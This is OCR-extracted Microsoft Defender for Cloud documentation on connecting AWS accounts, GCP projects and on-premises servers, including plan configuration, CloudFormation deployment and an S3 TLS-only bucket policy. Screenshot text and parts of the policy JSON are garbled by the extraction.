e Install SSM Agent for a hybrid and multicloud environment (Windows) £ 
e Install SSM Agent for a hybrid and multicloud environment (Linux) £ 


Ensure that your SSM Agent has the managed policy 
AmazonSSMManagedInstanceCore ¥ , which enables core functionality for the AWS 
Systems Manager service. 


If you want to manually install Azure Arc on your existing and future EC2 instances, use 
the EC2 instances should be connected to Azure Arc’ recommendation to identify 
instances that don't have Azure Arc installed. 


Enable these other extensions on the Azure Arc-connected machines: 


e Microsoft Defender for Endpoint 

e A vulnerability assessment solution (TVM or Qualys) 

e The Log Analytics agent on Azure Arc-connected machines or the Azure Monitor 
agent 


Make sure the selected Log Analytics workspace has a security solution installed. The 
Log Analytics agent and the Azure Monitor agent are currently configured at the 
subscription level. All of your AWS accounts and GCP projects under the same 
subscription inherit the subscription settings for the Log Analytics agent and the Azure 
Monitor agent. 


Learn more about monitoring components for Defender for Cloud. 


Defender for Servers assigns tags to your AWS resources to manage the auto- 
provisioning process. You must have these tags properly assigned to your resources so 
that Defender for Cloud can manage them: AccountId, Cloud, InstanceId, and 


MDFCSecurityConnector . 


Defender CSPM 


If you choose the Microsoft Defender CSPM plan, you need: 


e a Microsoft Azure subscription. If you don't have an Azure subscription, you can 
sign up for a free subscription”. 

e You must enable Microsoft Defender for Cloud on your Azure subscription. 

e Connect your non-Azure machines, AWS accounts. 

e In order to gain access to all of the features available from the CSPM plan, the plan 
must be enabled by the Subscription Owner. 


Learn more about how to enable Defender CSPM. 


Connect your AWS account 


To connect your AWS to Defender for Cloud by using a native connector: 


1. Sign in to the Azure portal Z. 


2. Go to Defender for Cloud > Environment settings. 


3. Select Add environment > Amazon Web Services. 


Home > Microsoft Defender for Cloud 


I Microsoft Defender for Cloud | Environment settings 


Showing 79 subscriptions 


l A Search « ++ Add environment v 


General & Amazon Web Services 


© Overview © Google Cloud Platform 


©) Refresh Si Guides & Feedback 


© 15 26 00 GO 


AWS accounts GCP projects GitHub connectors AzureDevOps connectors 


@ Getting started C) GitHub (preview) 


alti-cloud account management page (preview), To switch back to the classic cloud connectors experience, click here. 


$= Recommendations ÇJ Azure DevOps (preview) 


@ Security alerts E Search by name Environments == All Standards == All Coverage == All 
© Inventory Expand all 
@ Cloud Security Explorer (Preview) 
Name Ty 
@ Workbooks 
> © Azure 
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> Saws 
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Cloud Security 
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il} Environment settings ( iO) A 
HE Security solutions A A 
= 


ZA Workflow automation 


4. Enter the details of the AWS account, including the location where you store the 
connector resource. 


= Microsoft Azure (Preview) E Search resources, services, and docs (G+/) 


Home > Microsoft Defender for Cloud | Environment settings > 


Add AWS account 


Amazon Web Services 


@ Account details 2) Select plans ) Configure access 4) Review and generate 


Enter a descriptive name for the cloud account connector and choose where to save the connector resource. 


Connector name * Select a name ] 


(O) Management account O Single account 


27 selected v 
Subscription * © Contoso IT - Retail - Prod Vv 


Onboard * © 


AWS Regions * © 


Resource group * © Vv 
Create new 
Location * East US 
AWS account Id * Enter Id 


Excluded accounts 


Insert accounts to exclude - separated by ",” 


Optionally, select Management account to create a connector to a management 


account. Connectors are created for each member account discovered under the 


provided management account. Auto-provisioning is enabled for all of the newly 
onboarded accounts. 


Select Defender plans 


In this section of the wizard, you select the Defender for Cloud plans that you want to 
enable. 


1. Select Next: Select plans. 


The Select plans tab is where you choose which Defender for Cloud capabilities to 
enable for this AWS account. Each plan has its own requirements for permissions 
and might incur charges Z. 


= Microsoft Azure (Preview) 


© Important 


To present the current status of your recommendations, the Microsoft 
Defender Cloud Security Posture Management plan queries the AWS resource 
APIs several times a day. These read-only API calls incur no charges, but they 
are registered in CloudtTrail if you've enabled a trail for read events. 


As explained in the AWS documentation “, there are no additional charges 
for keeping one trail. If you're exporting the data out of AWS (for example, to 
an external SIEM system), this increased volume of calls might also increase 
ingestion costs. In such cases, we recommend filtering out the read-only calls 
from the Defender for Cloud user or ARN role: arn: aws: iam: : 
[accountId]:role/CspmMonitorAws. (This is the default role name. Confirm the 


role name configured on your account.) 


2. By default, the Servers plan is set to On. This setting is necessary to extend the 
coverage of Defender for Servers to AWS EC2. Ensure that you've fulfilled the 
network requirements for Azure Arc. 


Optionally, select Configure to edit the configuration as required. 


O Note 


The respective Azure Arc servers for EC2 instances or GCP virtual machines 
that no longer exist (and the respective Azure Arc servers with a status of 
Disconnected or Expired) are removed after 7 days. This process removes 
irrelevant Azure Arc entities to ensure that only Azure Arc servers related to 
existing instances are displayed. 


3. By default, the Containers plan is set to On. This setting is necessary to have 
Defender for Containers protect your AWS EKS clusters. Ensure that you've fulfilled 
the network requirements for the Defender for Containers plan. 


O Note 


Azure Arc-enabled Kubernetes, the Azure Arc extensions for Defender agent, 
and Azure Policy for Kubernetes should be installed. Use the dedicated 
Defender for Cloud recommendations to deploy the extensions (and Azure 
Arc, if necessary), as explained in Protect Amazon Elastic Kubernetes Service 
clusters. 


Optionally, select Configure to edit the configuration as required. If you choose to 
turn off this configuration, the Threat detection (control plane) feature is also 
disabled. Learn more about feature availability. 


4. By default, the Databases plan is set to On. This setting is necessary to extend 
coverage of Defender for SQL to AWS EC2 and RDS Custom for SQL Server. 


Optionally, select Configure to edit the configuration as required. We recommend 
that you leave it set to the default configuration. 


5. Select Next: Configure access. 


6. On the Configure access tab, select Click to download the CloudFormation 
template to download the CloudFormation template. 


Home > Microsoft Defender for Cloud | Environment settings > 


Add account 


Amazon Web Services 


iv) Account details © Select plans D Configure access 


EA Click to download the CloudFormation template 


AD Click to download the CloudFormation template 


@ Create Stack in AWS 


First, deploy the CloudFormation template on the master account you wish to onboard. Next, deploy the 
CloudFormation StackSet. 

1. Click GO to AWS’ 

2. In AWS, Select ‘Create stack’, "With new resources (standard)" 

3. Choose “Upload a template file’, ‘Choose file’ and select the downloaded template 

4. Click ‘Next’ and ‘Create stack’ 

5. Navigate to CloudFormation ‘StackSets’ 

6. Click ‘Create StackSet’ 

7. Choose ‘Upload a template file’, ‘Choose file’ and select the downloaded template 

8. Click ‘Next’ and ‘Submit 


Go to AWS 


Please insert the stackSet name 


StackSet name * 


Role ARN 


7. Continue to configure access by making the following selections: 
a. Choose a deployment type: 


e Default access: Allows Defender for Cloud to scan your resources and 
automatically include future capabilities. 

e Least privilege access: Grants Defender for Cloud access only to the current 
permissions needed for the selected plans. If you select the least privileged 
permissions, you'll receive notifications on any new roles and permissions 
that are required to get full functionality for connector health. 


b. Choose a deployment method: AWS CloudFormation or Terraform. 


Home > Microsoft Defender for Cloud | Environment settings 


Add AWS account 


Amazon Web Services 


© Account details iv} Select plans O Configure access 


EA Choose deployment type 
Permissions type © © Default access O Least privilege access 
AWS CloudFormation Terraform 


To configure access on AWS, a template has been generated based on the plans selected in the previous tab. Upon executing the 
template, custom role(s) will be created to facilitate the onboarding of the AWS account. 


D Copy 


(0) Deployment template is auto-filled with default role ARN names. To customize the role names, click here > 


@ Create Stack in AWS 


1. Log in to AWS CloudFormation Stacks. 

2. Under Specify template, select Upload a template file. 

3. Click Choose file to upload the CloudFormation script that was downloaded earlier and click Next. 

4. On Specify stack details enter stack name and click Next. 

5. On Configure stack options, use the default values and click Next. 

6. On Review check I acknowledge that AWS CloudFormation might create IAM resources with custom names. and click 
Submit. 


<Previous I pei : Review and generate > 


8. Follow the on-screen instructions for the selected deployment method to 
complete the required dependencies on AWS. If you're onboarding a management 
account, you need to run the CloudFormation template both as Stack and as 
StackSet. Connectors are created for the member accounts up to 24 hours after the 
onboarding. 


9. Select Next: Review and generate. 


10. Select Create. 


Defender for Cloud immediately starts scanning your AWS resources. Security 
recommendations appear within a few hours. 


Deploy a CloudFormation template to your 
AWS account 


As part of connecting an AWS account to Microsoft Defender for Cloud, you deploy a 
CloudFormation template to the AWS account. This template creates all of the required 
resources for the connection. 


Deploy the CloudFormation template by using Stack (or StackSet if you have a 
management account). When you're deploying the template, the Stack creation wizard 
offers the following options. 


Specify template 


A template is a JSON or YAML file that describes your stack’s resources and properties. 


Template source 


e ting a template generates an Amazon S3 URL where it will be stored 


© Amazon $3 URL Upload a template file 


Amazon $3 URL 
https:/, 


Amazon $3 templat E 


e Amazon S3 URL: Upload the downloaded CloudFormation template to your own 
S3 bucket with your own security configurations. Enter the URL to the S3 bucket in 
the AWS deployment wizard. 


e Upload a template file: AWS automatically creates an S3 bucket that the 
CloudFormation template is saved to. The automation for the S3 bucket has a 
security misconfiguration that causes the S3 buckets should require requests to 


use Secure Socket Layer recommendation to appear. You can remediate this 


recommendation by applying the following policy: 
Bash 


{ 
"Id": "ExamplePolicy", 
"Version": "2012-10-17", 
"Statement": [ 
{ 
"Sid": "AllowSSLRequestsOnly", 
“(Nercalo 8 Seis. 
"Effect": "Deny", 
"Resource": [ 
"<S3 Bucket ARN>", 
"<S3 Bucket ARN>/*" 


I 
"Condition": { 
"Bool": { 
"aws:SecureTransport": "false" 
} 
i 
*Pipalinveayoe ul g ke 


O Note 


When running the CloudFormation StackSets when onboarding an AWS 
management account, you may encounter the following error message: You 


must enable organizations access to operate a service managed stack set 


This error indicates that you have noe enabled the trusted access for AWS 


Organizations £. 


To remediate this error message, your CloudFormation StackSets page has a 
prompt with a button that you can select to enable trusted access. After 
trusted access is enabled, the CloudFormation Stack must be run again. 


Monitor your AWS resources 


The security recommendations page in Defender for Cloud displays your AWS resources. 
You can use the environments filter to enjoy multicloud capabilities in Defender for 
Cloud. 


To view all the active recommendations for your resources by resource type, use the 
asset inventory page in Defender for Cloud and filter to the AWS resource type that 


you're interested in. 


a Microsoft Defender for Cloud | Inventory = x 


Showing 75 subscriptions 


| P Search (Ctri+/ « © Refresh -} Add non-Azure servers “S Open query d Download CSV report 
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@ Getting started Resource types 
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Learn more 


Check out the following blogs: 


e Ignite 2021: Microsoft Defender for Cloud news E 
e Security posture management and server protection for AWS and GCP Z 


Clean up resources 


There's no need to clean up any resources for this article. 


Next steps 


Connecting your AWS account is part of the multicloud experience available in Microsoft 
Defender for Cloud: 


e Protect all of your resources with Defender for Cloud. 

e Set up your on-premises machines and GCP projects. 

e Get answers to common questions about onboarding your AWS account. 
e Troubleshoot your multicloud connectors. 


Connect your GCP project to Microsoft 
Defender for Cloud 


Article e 07/24/2023 


Workloads commonly span multiple cloud platforms. Cloud security services must do 
the same. Microsoft Defender for Cloud helps protect workloads in Google Cloud 
Platform (GCP), but you need to set up the connection between them and Defender for 
Cloud. 


If you're connecting a GCP project that you previously connected by using the classic 
connector, you must remove it first. Using a GCP project that's connected by both the 
classic and native connectors can produce duplicate recommendations. 


This screenshot shows GCP accounts displayed in the Defender for Cloud overview 
dashboard. 


ZZ 459 Ọ 23448 
Security alerts 


© Security posture 


& 227/261 % 101/109 


Thi sg 


D Workload protections In Inventory 


Resource c ere: i Ire 


Prerequisites 


To complete the procedures in this article, you need: 


e A Microsoft Azure subscription. If you don't have an Azure subscription, you can 


sign up for a free one”. 
e Microsoft Defender for Cloud set up on your Azure subscription. 


e Access to a GCP project. 


e Contributor permission on the relevant Azure subscription, and Owner permission 
on the GCP organization or project. 


You can learn more about Defender for Cloud pricing on the pricing page”. 


When you're connecting GCP projects to specific Azure subscriptions, consider the 
Google Cloud resource hierarchy” and these guidelines: 


e You can connect your GCP projects to Microsoft Defender for Cloud at the project 
level. 
e You can connect multiple projects to one Azure subscription. 


e You can connect multiple projects to multiple Azure subscriptions. 


Connect your GCP project 

To connect your GCP project to Defender for Cloud by using a native connector: 
1. Sign in to the Azure portal £. 
2. Go to Defender for Cloud > Environment settings. 


3. Select Add environment > Google Cloud Platform. 


Home > Microsoft Defender for Cloud 


I Microsoft Defender for Cloud | Environment settings 


Showing 79 subscription 
O Search < -} Add environment ~ Č) Refresh Q? Guides & Feedback 
General 
© 15 6 OO 30 
D Overview AWS accounts GCP projects GitHub connectors AzureDevOps connectors 


@ Getting started alti-cloud account management page (preview). To switch back to the classic cloud connectors experience, click here. 


EZ Recommendations 
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E DevOps Security (Preview) 


Management 


IE Environment settings 


IH Security solutions Q 


ZA Workflow automation 


4. Enter all relevant information. 


Home > Microsoft Defender for Cloud 


Create GCP connector 


Google cloud 


OProject details 


The first step to onboarding your GCP project is to enter a descriptive name for the cloud connector and choose whether to connect 


one project or the whole organization. 


Connector name * 


Onboard * © 


Subscription * © 


Resource group * © 


Location * 
GCP project number * 


GCP project Id * 


| Select a name | 


© Single project O Organization 


E 

Create new 
East US Vv | 
Project number | 


Project id E, 


Optionally, if you select Organization, a management project and an organization 
custom role are created on your GCP project for the onboarding process. 


Autoprovisioning is enabled for the onboarding of new projects. 


5. Select Next: Select plans. 


6. For the plans that you want to connect, turn the toggle to On. By default, all 


necessary prerequisites and components are provisioned. Learn how to configure 


each plan. 


If you choose to turn on the Microsoft Defender for Containers plan, ensure that 


you meet the network requirements for it. 


7. Select Next: Configure access. 


a. Choose the deployment type: 


e Default access: Allows Defender for Cloud to scan your resources and 


automatically include future capabilities. 


e Least privilege access: Grants Defender for Cloud access to only the 


current permissions needed for the selected plans. If you select the least 


privileged permissions, you'll receive notifications on any new roles and 


permissions that are required to get full functionality for connector health. 


b. Choose the deployment method: GCP Cloud Shell or Terraform. 


8. Select Copy. 


= Microsoft Azure (Preview) P Search resources, s€ 
Home > Microsoft Defender for Cloud 


Create GCP connector 


Google cloud 


iv} Project details © Select plans GO Configure access 


D Copy script to GCP Cloud Shell 


A Cloud Shell template to configure access on GCP side has been created according to the plans selected in the previous tab. 


attribute t l = 


GCP Cloud Shell > 


O Note 


For the discovery of GCP resources and for the authentication process, you 
must enable the following APIs: iam.googleapis.com, sts.googleapis.com, 
cloudresourcemanager.googleapis.com, iamcredentials.googleapis.com, and 
compute. googleapis.com. If you don't enable these APIs, we'll enable them 


during the onboarding process by running the GCloud script. 


9. Select GCP Cloud Shell >. The GCP Cloud Shell opens. 
10. Paste the script into the GCP Cloud Shell terminal and run it. 


11. Ensure that you created the following resources for Microsoft Defender Cloud 
Security Posture Management (CSPM) and Defender for Containers: 


CSPM Defender for Containers 


CSPM service account reader role Microsoft Defender for 


Containers service account role 
Microsoft Defender for Cloud identity federation 
Microsoft Defender Data 


CSPM identity pool Collector service account role 


Microsoft Defender for Servers service account (when the 


CSPM Defender for Containers 


servers plan is enabled) Microsoft Defender for Cloud 
identity pool 

Azure Arc for servers onboarding service account (when 

Azure Arc for servers autoprovisioning is enabled) 


After you create the connector, a scan starts on your GCP environment. New 
recommendations appear in Defender for Cloud after up to 6 hours. If you enabled 
autoprovisioning, Azure Arc and any enabled extensions are installed automatically for 
each newly detected resource. 


Optional: Configure selected plans 


By default, all plans are On. You can turn off plans that you don't need. 


Configure the Defender for Servers plan 


Microsoft Defender for Servers brings threat detection and advanced defenses to your 
GCP virtual machine (VM) instances. To have full visibility into Microsoft Defender for 
Servers security content, connect your GCP VM instances to Azure Arc. If you choose the 
Microsoft Defender for Servers plan, you need: 


e Microsoft Defender for Servers enabled on your subscription. Learn how to enable 
plans in Enable enhanced security features. 


e Azure Arc for servers installed on your VM instances. 


We recommend that you use the autoprovisioning process to install Azure Arc on your 
VM instances. Autoprovisioning is enabled by default in the onboarding process and 
requires Owner permissions on the subscription. The Azure Arc autoprovisioning 
process uses the OS Config agent on the GCP end. Learn more about the availability of 
the OS Config agent on GCP machines £. 


The Azure Arc autoprovisioning process uses the VM manager on GCP to enforce 
policies on your VMs through the OS Config agent. A VM that has an active OS Config 
agent” incurs a cost according to GCP. To see how this cost might affect your account, 
refer to the GCP technical documentation E. 


Microsoft Defender for Servers doesn't install the OS Config agent to a VM that doesn't 
have it installed. However, Microsoft Defender for Servers enables communication 

between the OS Config agent and the OS Config service if the agent is already installed 
but not communicating with the service. This communication can change the OS Config 


agent from inactive to active and lead to more costs. 


Alternatively, you can manually connect your VM instances to Azure Arc for servers. 
Instances in projects with the Defender for Servers plan enabled that aren't connected 
to Azure Arc are surfaced by the recommendation GCP VM instances should be 
connected to Azure Arc. Select the Fix option in the recommendation to install Azure 
Arc on the selected machines. 


The respective Azure Arc servers for EC2 instances or GCP virtual machines that no 
longer exist (and the respective Azure Arc servers with a status of Disconnected or 
Expired) are removed after seven days. This process removes irrelevant Azure Arc 
entities to ensure that only Azure Arc servers related to existing instances are displayed. 


Ensure that you fulfill the network requirements for Azure Arc. 
Enable these other extensions on the Azure Arc-connected machines: 


e Microsoft Defender for Endpoint 

e A vulnerability assessment solution (Microsoft Defender Vulnerability Management 
or Qualys) 

e The Log Analytics agent on Azure Arc-connected machines or the Azure Monitor 
agent 


Make sure the selected Log Analytics workspace has a security solution installed. The 
Log Analytics agent and the Azure Monitor agent are currently configured at the 
subscription level. All the multicloud accounts and projects (from both AWS and GCP) 
under the same subscription inherit the subscription settings for the Log Analytics agent 
and the Azure Monitor agent. Learn more about monitoring components for Defender 


for Servers. 


Defender for Servers assigns tags to your GCP resources to manage the 
autoprovisioning process. You must have these tags properly assigned to your resources 
so that Defender for Servers can manage your resources: Cloud, InstanceName, 


MDFCSecurityConnector, MachineId, ProjectId, and ProjectNumber. 


To configure the Defender for Servers plan: 
1. Follow the steps to connect your GCP project. 


2. On the Select plans tab, select Configure. 


© Auto-provisioning enabled 
Configure > 


3. On the Auto-provisioning configuration pane, turn the toggles to On or Off, 
depending on your need. 


Auto-provisioning configuration x 


To prevent, detect, and respond to threats, Microsoft Defender for Cloud collects security 
data and events from your machines. Learn more 


Azure Arc agent EO o 
Connects your servers to Azure. Enable to install Azure Arc on new and existing machines 
with OS config agent. 


Q Note: Note: When Arc auto-provisioning is enabled, it will connect existing OS 
config agents on GCP's side that are not communicating with the OS config service. 
This may lead to additional charges. For more information, see GCP documentation 


^ Additional extensions for Arc connected machines 
(preview) 


The selected extensions will be automatically provisioned on machines connected 
to Azure Arc. 


Microsoft Defender for Endpoint extension EO On 


Provides comprehensive endpoint detection and response (EDR) capabilities. 
Learn more 


Vulnerability assessment ( ©) On 


Enable vulnerability discovery and management tools for your machines. 
Learn more 


Vulnerability assessment solution 
(@) Microsoft threat and vulnerability management 


O Microsoft Defender for Cloud integrated Qualys scanner 


a If you've already configured auto provisioning for a BYOL solution, you'll need to 
disable it before you can configure this agent. Learn more 


If Azure Arc agent is Off, you need to follow the manual installation process 
mentioned earlier. 


4. Select Save. 


5. Continue from step 8 of the Connect your GCP project instructions. 


Configure the Defender for Databases plan 


To have full visibility into Microsoft Defender for Databases security content, connect 
your GCP VM instances to Azure Arc. 


To configure the Defender for Databases plan: 
1. Follow the steps to connect your GCP project. 


2. On the Select plans tab, select Configure. 


© Auto-provisioning enabled 
Configure > 


3. On the Auto-provisioning configuration pane, turn the toggles to On or Off, 
depending on your need. 


Auto-provisioning configuration x 


To prevent, detect, and respond to threats, Azure Defender for Cloud collects security data and 
events from your machines. Learn more. 


Azure Arc agent aD Go 
Connects your servers to Azure. Enable to install Azure Arc on new and existing machines with 
OS config agent. 


4è Note: Note: When Arc auto-provisioning is enabled, it will connect existing OS config 
agents on GCP’s side that are not communicating with the OS config service. This may 
lead to additional charges. For more information, see GCP documentation 


Additional agents for Arc connected machines 


Settings for the Log Analytics and discovery and registration service for SQL on Arc agents are 
managed at the subscription level. For advanced configuration, edit the subscription settings. 


a 


SQL servers on machines ( @) On 


Applies to SQL on Azure virtual machines, SQL servers on-premise, and Azure Arc enabled SQL 
servers. 
Learn more. 


a 


Log Analytics extension b DO On 


Collects security-related configurations and event logs from the machine and stores the data in 
your Log Analytics workspace for analysis. Learn more. 

Note: Settings for the Log Analytics agent are managed at the subscription level. For advanced 
configuration, edit the subscription settings. 


ri] Any other solutions enabled on the selected workspace will be applied to machines that 
are connected to it. For paid solutions, this could result in additional charges. 


Automatic SQL server discovery and registration (@ ) Of 


This feature will discover and register both existing and future SQL servers 2012+ which are 
running on your virtual machines, enabling better manageability of security posture and more 
comprehensive data assets inventory. 


The machines will be registered as SQL ARC enabled servers. Neither the SQL nor the host will 
be required a restart. 
Learn more. 


= 


If the toggle for Azure Arc is Off, you need to follow the manual installation 
process mentioned earlier. 


4. Select Save. 


5. Continue from step 8 of the Connect your GCP project instructions. 


Configure the Defender for Containers plan 


Microsoft Defender for Containers brings threat detection and advanced defenses to 
your GCP Google Kubernetes Engine (GKE) Standard clusters. To get the full security 
value out of Defender for Containers and to fully protect GCP clusters, ensure that you 
meet the following requirements. 


O Note 


e |f you choose to disable the available configuration options, no agents or 
components will be deployed to your clusters. Learn more about feature 
availability. 

e Defender for Containers when deployed on GCP, may incur external costs 


such as logging costs“, pub/sub costs” and egress costs“. 


e Kubernetes audit logs to Defender for Cloud: Enabled by default. This 
configuration is available at the GCP project level only. It provides agentless 
collection of the audit log data through GCP Cloud Logging “ to the Microsoft 
Defender for Cloud back end for further analysis. 

e Azure Arc-enabled Kubernetes, the Defender extension, and the Azure Policy 
extension: Enabled by default. You can install Azure Arc-enabled Kubernetes and 
its extensions on your GKE clusters in three ways: 

o Enable Defender for Containers autoprovisioning at the project level, as 
explained in the instructions in this section. We recommend this method. 

o Use Defender for Cloud recommendations for per-cluster installation. They 
appear on the Microsoft Defender for Cloud recommendations page. Learn how 
to deploy the solution to specific clusters. 

o Manually install Arc-enabled Kubernetes and extensions. 


To configure the Defender for Containers plan: 
1. Follow the steps to connect your GCP project. 


2. On the Select plans tab, select Configure. 


ZA Fully configured: 3 / 3 
Configure > 


3. On the Defender for Containers configuration pane, turn the toggles to On. 


Defender for Containers configuration x 


Kubernetes audit logs to Defender for Cloud. dD On 


Send control plane audit logs from the GKE control plane to your project's Cloud Logging and 
create Pub/Sub resources. 


OO This will incur additional charges on your GCP project. 


Auto provision Defender’s extension for Azure Arc. dD On 


The Defender extension is a DaemonSet that sends security-related data to Defender for 
Cloud, to provide threat protection for GKE clusters. Azure Arc connects your GKE cluster to 
Azure. 


(i) This is an extension to Azure Arc-enabled Kubernetes. For GKE clusters that are not already 
connected to Arc, this installs an Arc-enabled Kubernetes agent. 


Auto provision Azure Policy extension for Azure Arc. dD On 


Extends Gatekeeper v3, to apply at-scale enforcements and safeguards on your clusters in a 
centralized, consistent manner. 


OO This is an extension to Azure Arc-enabled Kubernetes. For GKE clusters that are not already 
connected to Arc, this installs an Arc-enabled Kubernetes agent. 


Save Cancel 


4. Select Save. 


5. Continue from step 8 of the Connect your GCP project instructions. 


Monitor your GCP resources 


The security recommendations page in Defender for Cloud displays your GCP resources 
together with your Azure and AWS resources for a true multicloud view. 


To view all the active recommendations for your resources by resource type, use the 
asset inventory page in Defender for Cloud and filter to the GCP resource type that 
you're interested in. 
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Ọ Workload protections 


Next steps 


Connecting your GCP project is part of the multicloud experience available in Microsoft 
Defender for Cloud: 


e Protect all of your resources with Defender for Cloud. 
e Set up your on-premises machines and AWS account. 
e Troubleshoot your multicloud connectors. 

e 


Get answers to common questions about connecting your GCP project. 


Connect your non-Azure machines to 
Microsoft Defender for Cloud with 
Defender for Endpoint 
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Defender for Cloud allows you to directly onboard your non-Azure servers by deploying 
the Defender for Endpoint agent. This provides protection for both your cloud and non- 
cloud assets under a single, unified offering. 


O Note 


To connect your non-Azure machines via Azure Arc, see Connect your non-Azure 
machines to Microsoft Defender for Cloud with Azure Arc. 


This tenant-level setting allows you to automatically and natively onboard any non- 
Azure server running Defender for Endpoint to Defender for Cloud, without any extra 
agent deployments. This onboarding path is ideal for customers with mixed and hybrid 
server estate who wish to consolidate server protection under Defender for Servers. 


Availability 


Aspect Details 
Release state GA 
Supported All Windows and Linux Server operating systems supported by Defender 


operating systems for Endpoint 


Required roles and To manage this setting, you need Subscription Owner (on the chosen 
permissions subscription), and Microsoft Entra Global Administrator or Microsoft 
Entra Security Administrator 


Environments On-premises servers 
Multicloud VMs — limited support (see limitations section) 


Supported plans Defender for Servers P1 
Defender for Servers P2 — limited features (see limitations section) 


How it works 


Direct onboarding is a seamless integration between Defender for Endpoint and 
Defender for Cloud that doesn’t require extra software deployment on your servers. 
Once enabled, it also shows your non-Azure server devices onboarded to Defender for 
Endpoint in Defender for Cloud, under a designated Azure Subscription you configure 
(in addition to their regular representation in the Microsoft 365 Defender portal). The 
Azure Subscription is used for licensing, billing, alerts, and security insights but doesn't 
provide server management capabilities such as Azure Policy, Extensions, or Guest 
configuration. To enable server management capabilities, refer to the deployment of 


Azure Arc. 


Enabling direct onboarding 


Enabling direct onboarding is an opt-in setting at the tenant level. It affects both 
existing and new servers onboarded to Defender for Endpoint in the same Microsoft 
Entra tenant. Shortly after enabling this setting, your server devices will show under the 
designated subscription. Alerts, software inventory, and vulnerability data are integrated 
with Defender for Cloud, in a similar way to how it works with Azure VMs. 


Before you begin: 


e Make sure you have the required permissions 

e |f you have a Microsoft Defender for Endpoint for Servers license on your tenant, 
make sure to indicate it in Defender for Cloud 

e Review the limitations section 


Enabling in the Defender for Cloud portal 


1. Go to Defender for Cloud > Environment Settings > Direct onboarding. 

2. Switch the Direct onboarding toggle to On. 

3. Select the subscription you would like to use for servers onboarded directly with 
Defender for Endpoint 

4. Select Save. 


— Microsoft Azure E Search resources, services, and docs (G+/) fy Q ZO © A 


Home > Microsoft Defender for Cloud | Environment settings 


Direct onboarding with Defender for Endpoint 


Onboard non-Azure servers to Defender for Servers using only Defender for Endpoint agent. After enabling this setting, 
non-Azure servers onboarded to Defender for Endpoint on this tenant be reflected and billed under a designated Azure subscription. Learn more 


@ If Defenders for Servers is off for this subscription - Defenders for Servers P1 will be enabled for it. 
Direct onboarding OO on 


Designated subscription On-premise servers v 


| Filter items. 


On-premise servers 


You've now successfully enabled direct onboarding on your tenant. After you enable it 
for the first time, it may take up to 24 hours to see your non-Azure servers in your 
designated subscription. 


Deploying Defender for Endpoint on your servers 


Deploying the Defender for Endpoint agent on your on-premises Windows and Linux 
servers is the same whether you use direct onboarding or not. Refer to the Defender for 
Endpoint onboarding guide for further instructions. 


Current limitations 


e Plan support: Direct onboarding provides access to all Defender for Servers Plan 1 
features. However, certain features in Plan 2 still require the deployment of the 
Azure Monitor Agent, which is only available with Azure Arc on non-Azure 
machines. If you enable Plan 2 on your designated subscription, machines 
onboarded directly with Defender for Endpoint have access to all Defender for 
Servers Plan 1 features and the Defender Vulnerability Management Addon 
features included in Plan 2. 


e Multi-cloud support: You can directly onboard VMs in AWS and GCP using the 
Defender for Endpoint agent. However, if you plan to simultaneously connect your 
AWS or GCP account to Defender for Servers using multicloud connectors, it's 
currently still recommended to deploy Azure Arc. 


e Simultaneous onboarding limited support: Defender for Cloud makes a best 
effort to correlate servers onboarded using multiple billing methods. However, in 
certain server deployment use cases, there may be limitations where Defender for 


Cloud is unable to correlate your machines. This may result in overcharges on 


certain devices if direct onboarding is also enabled on your tenant. 


The following are deployment use cases currently with this limitation when used 


with direct onboarding of your tenant: 


Location 


All 


On-premises 
(not running 
Azure Arc) 


AWS, GCP 
(not running 
Azure Arc) 


Deployment use case 


Windows 2012, 2016: 
Azure VMs or Azure Arc machines already onboarded and billed by 


Defender for Servers via an Azure subscription or Log Analytics workspace, 
running the Defender for Endpoint modern unified agent without the 
MDE.Windows Azure extension. For such machines, you can enable 
Defender for Cloud integration with Defender for Endpoint to deploy the 
extension. 


Windows Server 2012, 2016: 
Servers running the Defender for Endpoint modern unified agent, and 


already billed by Defender for Servers P2 via the Log Analytics workspace 


Windows Server 2012, 2016: 
AWS or GCP VMs using the modern unified Defender for Endpoint solution, 


already onboarded and billed by Defender for Servers via multicloud 
connectors, Log Analytics workspace, or both. 


Note: For Windows 2019 and above and Linux, agent version updates have been 


already released to support simultaneous onboarding without limitations. For 


Windows - use agent version 10.8555.X and above, For Linux - use agent version 
30.101.23052.009 and above. 


Next steps 


This page showed you how to add your non-Azure machines to Microsoft Defender for 


Cloud. To monitor their status, use the inventory tools as explained in the following 


page: 


e Explore and manage your resources with asset inventory 


Connect your non-Azure machines to 
Microsoft Defender for Cloud 
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Microsoft Defender for Cloud can monitor the security posture of your non-Azure 
machines, but first you need to connect them to Azure. 


You can connect your non-Azure computers in any of the following ways: 


e Onboarding with Azure Arc: 
o By using Azure Arc-enabled servers (recommended) 
o By using the Azure portal 
e Onboarding directly with Microsoft Defender for Endpoint 


This article describes the methods for onboarding with Azure Arc. 


If you're connecting machines from other cloud providers, see Connect your AWS 
account or Connect your GCP project. The multicloud connectors for Amazon Web 
Services (AWS) and Google Cloud Platform (GCP) in Defender for Cloud transparently 
handle the Azure Arc deployment for you. 


Prerequisites 
To complete the procedures in this article, you need: 


e A Microsoft Azure subscription. If you don't have an Azure subscription, you can 


sign up for a free one”. 
e Microsoft Defender for Cloud set up on your Azure subscription. 


e Access to an on-premises machine. 


Connect on-premises machines by using Azure 
Arc 


A machine that has Azure Arc-enabled servers becomes an Azure resource. When you 
install the Log Analytics agent on it, it appears in Defender for Cloud with 


recommendations, like your other Azure resources. 


Azure Arc-enabled servers provide enhanced capabilities, such as enabling guest 
configuration policies on the machine and simplifying deployment with other Azure 


services. For an overview of the benefits of Azure Arc-enabled servers, see Supported 
cloud operations. 


To deploy Azure Arc on one machine, follow the instructions in Quickstart: Connect 
hybrid machines with Azure Arc-enabled servers. 


To deploy Azure Arc on multiple machines at scale, follow the instructions in Connect 
hybrid machines to Azure at scale. 


Defender for Cloud tools for automatically deploying the Log Analytics agent work with 
machines running Azure Arc. However, this capability is currently in preview. When you 
connect your machines by using Azure Arc, use the relevant Defender for Cloud 
recommendation to deploy the agent and benefit from the full range of protections that 
Defender for Cloud offers: 


e Log Analytics agent should be installed on your Linux-based Azure Arc machines S 
e Log Analytics agent should be installed on your Windows-based Azure Arc 


machines E 


Connect on-premises machines by using the 
Azure portal 


After you connect Defender for Cloud to your Azure subscription, you can start 
connecting your on-premises machines from the Getting started page in Defender for 
Cloud. 


1. Sign in to the Azure portal £. 

2. Search for and select Microsoft Defender for Cloud. 

3. On the Defender for Cloud menu, select Getting started. 
4. Select the Get started tab. 


5. Find Add non-Azure servers and select Configure. 
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A list of your Log Analytics workspaces appears. 


